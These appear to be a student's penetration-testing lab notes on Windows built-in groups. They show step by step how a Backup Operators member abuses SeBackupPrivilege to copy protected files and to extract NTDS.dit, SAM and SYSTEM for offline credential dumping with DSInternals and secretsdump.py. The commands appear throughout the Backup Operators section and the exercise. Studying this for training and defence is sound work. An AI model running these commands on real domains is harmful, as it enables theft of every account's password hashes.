# Intro - Windows servers and Domain Controllers have a variety of built-in groups that either default to Windows or get added when the AD Domain Services role is installed on a system to promote a server to a Domain Controller - Many of these groups confer special privs on their members, and some can be leveraged to privesc on a server or a Domain Controller - [Here](https://ss64.com/nt/syntax-security_groups.html) is a listing of all built-in Windows groups along with a detailed description of each - This [page](https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/plan/security-best-practices/appendix-b--privileged-accounts-and-groups-in-active-directory) has a detailed listing of privileged accounts and groups in AD - Short list of notable groups for pentesting purposes: - Backup Operators - Event Log Readers - DNSAdmins - Hyper-V Admins - Print Operators - Server Operators # Backup Operators - Membership to the Backup Operators group grants its members the `SeBackup` and `SeRestore` privs - The [SeBackupPrivilege](https://docs.microsoft.com/en-us/windows-hardware/drivers/ifs/privileges) allows us to traverse any folder and list the folder contents - This will let us copy a file from a folder, even if there is no access control entry (ACE) for the subject user in the folder's ACL - However, we can't do this using the standard copy command; istead, we need to programmatically copy the data, making sure to specify the [FILE_FLAG_BACKUP_SEMANTICS](https://docs.microsoft.com/en-us/windows/win32/api/fileapi/nf-fileapi-createfilea) flag ## Exploiting `SeBackupPrivilege` - We can use this [PoC](https://github.com/giuliano108/SeBackupPrivilege) to exploit `SeBackupPrivilege`, and copy a file - First, let's import the libraries in a PowerShell session ```powershell Import-Module .\SeBackupPrivilegeUtils.dll Import-Module .\SeBackupPrivilegeCmdLets.dll ``` ### Enable `SeBackupPrivilege` - Now, determine whether `SeBackupPrivilege` is enabled with either of the two commands below - NOTE: we may need an elevated session to issue these command ```powershell whoami /priv Get-SeBackupPrivilege ``` - If disabled based on the above, enable `SeBackupPrivilege` and confirm as below ```powershell Set-SeBackupPrivilege whoami /priv Get-SeBackupPrivilege ``` ### Copy Protected File - Identify and enumerate the target, protected file ```powershell dir C:\Confidential\ type 'C:\Confidential\2021 Contract.txt' ``` - The above shows that we cannot read the target, protected file - Now, use the `Copy-FileSeBackupPrivilege` cmdlet we imported above to copy the target, protected file, then read at our leisure ```powershell Copy-FileSeBackupPrivilege 'C:\Confidential\2021 Contract.txt' .\Contract.txt type .\Contract.txt ``` ### Attacking a DC - Copying `NTDS.dit` - `SeBackupPrivilege` permits logging in locally to a domain controller - From this vantage point, the AD db named `NTDS.dit` is a very attractive target, as it contains the NTLM hashes for all user and computer objects in the domain - However, `NTDS.dit` file is locked by default and not accessible by unprivileged users - Because the `NTDS.dit` file is locked by default, we can use the Windows [diskshadow](https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/diskshadow) utility to create a shadow copy of the `C` drive and expose it as `E` drive ```powershell-session diskshadow.exe DISKSHADOW> set verbose on DISKSHADOW> set metadata C:\Windows\Temp\meta.cab DISKSHADOW> set context clientaccessible DISKSHADOW> set context persistent DISKSHADOW> begin backup DISKSHADOW> add volume C: alias cdrive DISKSHADOW> create DISKSHADOW> expose %cdrive% E: DISKSHADOW> end backup DISKSHADOW> exit dir E: ``` - Next, use the `Copy-FileSeBackupPrivilege` cmdlet to bypass the ACL and copy the `NTDS.dit` locally ```powershell Copy-FileSeBackupPrivilege E:\Windows\NTDS\ntds.dit C:\Tools\ntds.dit ``` - `SeBackupPrivilege` also allows us to back up the SAM and SYSTEM registry hives, which we can extract local account credentials offline using `secretsdump.py` ```cmd reg save HKLM\SYSTEM SYSTEM.SAV reg save HKLM\SAM SAM.SAV ``` - Finally,  extract all Active Directory account credentials with the PowerShell `DSInternals` module or `secretsdump.py` #### Extract AD creds from `NTDS.dit` using `DSInternals` ```powershell Import-Module .\DSInternals.psd1 $key = Get-BootKey -SystemHivePath .\SYSTEM Get-ADDBAccount -DistinguishedName 'CN=administrator,CN=users,DC=inlanefreight,DC=local' -DBPath .\ntds.dit -BootKey $key ``` #### Extract AD creds from `NTDS.dit` using `secretsdump.py ```bash secretsdump.py -ntds ntds.dit -system SYSTEM -hashes lmhash:nthash LOCAL ``` ##### Copying Files with `robocopy` -  [robocopy](https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/robocopy) can be used to copy files in backup mode as well and is a command-line directory replication tool ```cmd robocopy /B E:\Windows\NTDS .\ntds ntds.dit ``` --- # Exercise - `ping` test ![[images/Pasted image 20260219190955.png]] - `nmap` scan ![[images/Pasted image 20260219191010.png]] - `rdp` into target with given creds ![[images/Pasted image 20260219191100.png]] - light internal enum ![[images/Pasted image 20260219191148.png]] - NOTE: `SeBackup` is disabled - look at available tools ![[images/Pasted image 20260219191359.png]] - test target dir and file > access denied ![[images/Pasted image 20260219191321.png]] - Import modules ![[images/Pasted image 20260219191508.png]] - Enable `SeBackup` and confirm ![[images/Pasted image 20260219191535.png]] - Copy target file with `Copy-FileSeBackupPrivilege` and `type` ![[images/Pasted image 20260219191709.png]]